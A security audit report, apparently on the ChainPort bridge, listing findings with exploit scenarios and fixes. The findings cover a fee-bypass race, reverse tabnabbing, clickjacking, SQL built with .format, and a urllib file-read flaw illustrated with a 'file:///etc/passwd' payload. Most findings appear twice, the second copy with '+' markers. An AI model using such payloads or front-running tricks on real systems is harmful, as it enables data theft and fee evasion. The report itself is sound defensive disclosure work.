TOB-CHPT-15 Target: contracts/ChainportFeeManager.sol Description ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sufficient PORTX balance in the ChainportFeeManager contract. [REDACTED] Figure 15.1: chainport-backend/project/lambdas/fees/fees.py#L219-L249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is confirmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments. 16.
Signature-related code lacks a proper specification and documentation Severity: Medium Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-16 Target: Signature-related code Description ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPort’s use of signatures: ● Why does the signed message contain a networkId field, and why does it have to be unique? If it were not, an operation to mint tokens on one chain could be replayed on another chain. ● Why does the signed message contain an action field? The action field prevents replay attacks in networks that have both a main and side bridge. Without this field, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. ● Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specification describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided. 17. Cryptographic primitives lack sanity checks and clear function names Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-17 Target: chainport-backend/modules/cryptography_2key/signatures.py Description Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (figure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (figure 17.2). [REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (figure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (figure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-L62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this finding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend fixing the issues described in this finding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and fix the naming issues described above.
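A sketch of such checks follows (hedged: figures 17.1 and 17.3 are redacted here, so the bodies below are reconstructed from the finding text only):

def remove_0x(value: str) -> str:
    # Fail loudly on unexpected input instead of silently mangling it.
    if not value.startswith("0x"):
        raise ValueError(f"expected a 0x-prefixed hex string, got {value!r}")
    return value[2:]

def pad_to_64_hex_chars(value: str) -> str:
    # Renamed from add_leading_0 so the 64-character target is explicit.
    if len(value) > 64:
        raise ValueError("value longer than 64 hex characters")
    return value.zfill(64)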
Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions’ purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions’ purposes. 18. Use of requests without the timeout argument Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-CHPT-18 Target: The chainport-backend repository Description The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library has no timeout and waits indefinitely for a response; without the timeout argument, a call to a server that never responds will hang the program indefinitely. The following locations in the back-end code are missing the timeout argument: ● chainport-backend/modules/coingecko/api.py#L29 ● chainport-backend/modules/requests_2key/requests.py#L14 ● chainport-backend/project/stats/cg_prices.py#L74 ● chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: ● https://api.coingecko.com ● https://ethgasstation.info ● https://gasstation-mainnet.matic.network If any of these websites hang indefinitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indefinitely. This causes the back end to hang, and token ports from other users cannot be processed. Recommendations Short term, add the timeout argument to each of the code locations indicated above (e.g., requests.get(url, timeout=10)). This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument. 19. Lack of noopener attribute on external links Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-19 Target: chainport-app/src/modules/exchange/components/PortOutModal.jsx Description In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent window’s location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel="noopener noreferrer" attribute to the anchor tags. References ● OWASP: Reverse tabnabbing attacks 20.
Use of urllib could allow users to leak local files Severity: Undetermined Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-20 Target: chainport-backend/modules/infrastructure/aws/s3.py Description To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (figure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local files. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-L29 The code in figure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopen’s support of the file:// scheme We set the severity of this finding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds files that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local file (e.g., file:///etc/passwd). This local file is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local file is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme. 21. The front end is vulnerable to iFraming Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-21 Target: The chainport-app repository Description The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPort’s front end. The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end. 22. Lack of CSP header in the ChainPort front end Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-22 Target: The chainport-app repository Description The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker finds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the effects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References ● HTTP Content Security Policy (CSP) ● Google CSP Evaluator ● Google Web Security Fundamentals: Eval ● Google Web Security Fundamentals: Inline code is considered harmful
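As a combined illustration for TOB-CHPT-21 and TOB-CHPT-22, the sketch below sets both headers in a Flask-style handler (an assumption about the serving stack; the policy values are only a starting point and must be adapted to the app’s real resource origins):

from flask import Flask

app = Flask(__name__)

@app.after_request
def set_security_headers(response):
    # TOB-CHPT-21: forbid all iFraming of the front end.
    response.headers["X-Frame-Options"] = "DENY"
    # TOB-CHPT-22: restrictive starting-point CSP; validate the final
    # policy with the CSP Evaluator before deploying.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; frame-ancestors 'none'; object-src 'none'"
    )
    return response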
Use of error-prone pattern for logging functions Severity: Low Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-3 Target: The chainport-backend repository Description The pattern shown in figure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplified in figure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these findings. [REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the application’s flow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in figure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to find the errors before the code hits production. +4. Use of hard-coded strings instead of constants Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-4 Target: The chainport-backend repository Description The back-end code uses several hard-coded strings that could be defined as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the system’s environment compare the result of the get_env function with the strings “develop”, “staging”, “prod”, or “local”. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not find any typos in these literal strings, so we set the severity of this finding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest fixing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in figure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always fails—the correct value to test should have been “develop”. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the system’s environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. 
Long term, review the code for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available. +5. Use of incorrect operator in SQLAlchemy filter Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-5 Target: chainport-backend/project/data/db/port.py#L173 Description The back-end code uses the is not operator in an SQLAlchemy query’s filter. SQLAlchemy relies on the __eq__ family of methods to apply the filter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. [REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this flawed check to bypass the system’s business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-filter Semgrep rule as part of the CI/CD flow. References ● SQLAlchemy: Common Filter Operators ● Stack Overflow: Select NULL Values in SQLAlchemy +6. Several functions receive the wrong number of arguments Severity: Undetermined Difficulty: Undetermined Type: Undefined Behavior Finding ID: TOB-CHPT-6 Target: The chainport-backend repository Description Several functions in the chainport-backend repository are called with an incorrect number of arguments: ● Several functions in the /project/deprecated_files folder ● A call to release_tokens_by_maintainer from the rebalance_bridge function (figures 6.1 and 6.2) ● A call to generate_redeem_signature from the regenerate_signature function (figures 6.3 and 6.4) ● A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (figures 6.5 and 6.6) ● A call to get_cg_token_address_list from the main function of the file (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least five are required.
(chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L114) [REDACTED] Figure 6.2: The definition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L34) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_signature.py#L38-L43) [REDACTED] Figure 6.4: The definition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transaction.py#L32-L34) [REDACTED] Figure 6.6: The definition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-91) [REDACTED] Figure 6.8: The definition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this flaw could be used to bypass the system’s business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker finds another flaw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account. Recommendations Short term, fix the errors presented in the description of this finding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a function’s arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be flagged before the code is deployed. +7. Lack of events for critical operations Severity: Informational Difficulty: High Type: Auditing and Logging Finding ID: TOB-CHPT-7 Target: ChainportMainBridge.sol, ChainportSideBridge.sol, Validator.sol Description Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing confirmation of that operation to the contract’s caller (figure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior.
Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. +8. Lack of zero address checks in setter functions Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-CHPT-8 Target: ChainportMainBridge.sol, ChainportMiddleware.sol, ChainportSideBridge.sol Description Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can define the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconfiguration causes the system to behave unexpectedly, and the system must be redeployed once the misconfiguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. +9. Python type annotations are missing from most functions Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-CHPT-9 Target: The chainport-backend repository Description The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (figure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function. This will not prevent the code from crashing or causing undefined behavior during runtime; however, it will allow developers to clearly see each argument’s expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted. +10. Use of libraries with known vulnerabilities Severity: Low Difficulty: Low Type: Patching Finding ID: TOB-CHPT-10 Target: The chainport-backend repository Description The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by Trail of Bits with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identified two known vulnerabilities in the project’s dependencies (as shown in figure 10.1).
[REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the project’s dependencies to their latest versions wherever possible. Use pip-audit to confirm that no vulnerable dependencies remain. Long term, add pip-audit to the project’s CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities. +11. Use of JavaScript instead of TypeScript Severity: Low Difficulty: Low Type: Configuration Finding ID: TOB-CHPT-11 Target: The chainport-app repository Description The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. By contrast, JavaScript code will crash (or worse) at runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: ● It improves code readability; developers can easily identify variable types and the types that functions receive. ● It improves security by providing static type checking that catches errors during compilation. ● It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript. TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript. +12. Use of .format to create SQL queries Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-CHPT-12 Target: [REDACTED] Description The back end builds SQL queries with the .format function. An attacker that controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the fields described above are attacker-controlled, so we set the severity of this finding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer. +13. Many rules are disabled in the ESLint configuration Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-CHPT-13 Target: chainport-app/.eslintrc.js Description There are 34 rules disabled in the front-end ESLint configuration.
Disabling some of these rules does not cause problems, but disabling others reduces the code’s security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the code’s readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specific rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specific rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the code’s security or readability, document the justification, and enable every other rule. Fix any findings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled. +14. Congress can lose quorum after manually setting the quorum value Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-CHPT-14 Target: contracts/governance/ChainportCongressMembersRegistry.sol Description Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. By default, when a new member is added to the congress, the quorum is updated to be N − 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership. [REDACTED] Figure 14.2: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.sol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes.
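A toy Python model of the failure mode (the numbers come from the exploit scenario above; the function name is hypothetical):

    def quorum_after_member_added(num_members: int) -> int:
        # Mirrors the on-chain behavior described above: adding a member
        # resets the minimum quorum to N - 1, silently discarding any
        # manually set value.
        return num_members - 1

    members, quorum = 10, 6     # congress of 10 manually lowers the quorum to 6
    members += 1                # Bob is added while Carol and Dave are away
    quorum = quorum_after_member_added(members)
    assert quorum == 10         # 10 of 11 signatures now required: deadlock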
+15. Potential race condition could allow users to bypass PORTX fee payments Severity: Low Difficulty: Medium Type: Timing Finding ID: TOB-CHPT-15 Target: contracts/ChainportFeeManager.sol Description ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sufficient PORTX balance in the ChainportFeeManager contract. [REDACTED] Figure 15.1: chainport-backend/project/lambdas/fees/fees.py#L219-249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is confirmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments. +16. Signature-related code lacks a proper specification and documentation Severity: Medium Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-16 Target: Signature-related code Description ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPort’s use of signatures: ● Why does the signed message contain a networkId field, and why does it have to be unique? Without a unique networkId, an operation to mint tokens on one chain could be replayed on another chain. ● Why does the signed message contain an action field? The action field prevents replay attacks in networks that have both a main and side bridge. Without this field, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. ● Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specification describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided. +17.
Cryptographic primitives lack sanity checks and clear function names Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-CHPT-17 Target: chainport-backend/modules/cryptography_2key/signatures.py Description Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (figure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (figure 17.2). [REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (figure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (figure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this finding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend fixing the issues described in this finding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and fix the naming issues described above. Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions’ purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions’ purposes. +18. Use of requests without the timeout argument Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-CHPT-18 Target: The chainport-backend repository Description The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library will wait until the connection is closed before fulfilling a request. Without the timeout argument, the program will hang indefinitely. The following locations in the back-end code are missing the timeout argument: ● chainport-backend/modules/coingecko/api.py#L29 ● chainport-backend/modules/requests_2key/requests.py#L14 ● chainport-backend/project/stats/cg_prices.py#L74 ● chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: ● https://api.coingecko.com ● https://ethgasstation.info ● https://gasstation-mainnet.matic.network If any of these websites hang indefinitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indefinitely. This causes the back end to hang, and token ports from other users cannot be processed. 
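For illustration, a guarded call might look like the following sketch (the endpoint path and the ten-second value are placeholders, not taken from the codebase):

    import requests

    try:
        # An explicit timeout bounds how long the call can block; without it,
        # requests waits indefinitely for the remote server.
        response = requests.get("https://api.coingecko.com/api/v3/ping", timeout=10)
    except requests.exceptions.Timeout:
        response = None  # degrade gracefully instead of hanging the back end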
Recommendations Short term, add the timeout argument to each of the code locations indicated above. This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument. +19. Lack of noopener attribute on external links Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-19 Target: chainport-app/src/modules/exchange/components/PortOutModal.jsx Description In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent window’s location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel="noopener noreferrer" attribute to the anchor tags. References ● OWASP: Reverse tabnabbing attacks +20. Use of urllib could allow users to leak local files Severity: Undetermined Difficulty: High Type: Data Exposure Finding ID: TOB-CHPT-20 Target: chainport-backend/modules/infrastructure/aws/s3.py Description To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (figure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local files. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-29 The code in figure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopen’s support of the file:// scheme We set the severity of this finding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds files that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local file (e.g., file:///etc/passwd). This local file is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local file is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme. +21. The front end is vulnerable to iFraming Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-21 Target: The chainport-app repository Description The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPort’s front end. 
